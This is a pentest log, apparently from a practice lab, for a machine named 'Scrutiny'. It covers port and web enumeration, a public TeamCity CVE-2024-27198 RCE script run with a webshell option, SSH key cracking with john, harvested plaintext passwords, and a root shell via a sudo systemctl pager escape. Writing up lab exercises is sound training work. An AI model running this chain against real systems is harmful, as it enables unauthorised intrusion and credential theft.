Scrutiny
๐งช Pentest Log: {{date:2025-08-23}}
๐ Target Information
- Machine Name: Scrutiny
- IP Address: 192.168.217.91
- Operating System: Linux
ip=192.168.217.91
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 25
Port 80
Web Directory Scan
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
feroxbuster --url http://$ip
wpscan --url http://$ip
dirsearch -u http://$ip -r -o dirsearch.txt
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://$ip$/ -H "Host: FUZZ.website.com"
nikto -h http://$ip
curl -s http://$ip/ | html2markdown
Found, subdomain under the login button
teams.onlyrands.com
Visit the login.html page, found
TeamCity Version 2023.05.4
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://github.com/W01fh4cker/CVE-2024-27198-RCE?tab=readme-ov-file
python3 CVE-2024-27198-RCE.py -t http://teams.onlyrands.com --behinder4
Login to the website, obtain id_rsa from marcot's pending builds
Crack the password from id_rsa using john
ssh2john id_rsa > ssh.hash
john ssh.hash --wordlist='/home/kali/Documents/oscp/rockyou.txt'
Obtain marcot's credential
marcot:cheer
๐งฌ Privilege Escalation
๐ค Current Access
- User: marcot
- Groups: 1004(freelancers)
- Shell Type: reverse shell
๐ Enumeration
mail
Found matthewa's credential
matthewa:IdealismEngineAshen476
Found a special file within matthewa's home directory
cat .~
Dach's password is "RefriedScabbedWasting502". I saw it once when he had to use my terminal to check TeamCity's status.
Switch to briand
su briand
Sudo
sudo -l
Found
User briand may run the following commands on onlyrands:
(root) NOPASSWD: /usr/bin/systemctl status teamcity-server.service
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Sudo Abuse
- Target Binary/Service: systemctl
- Reference / Source: GTFOBins
๐ง Exploit Steps
- Smash to root
sudo /usr/bin/systemctl status teamcity-server.service
!/bin/sh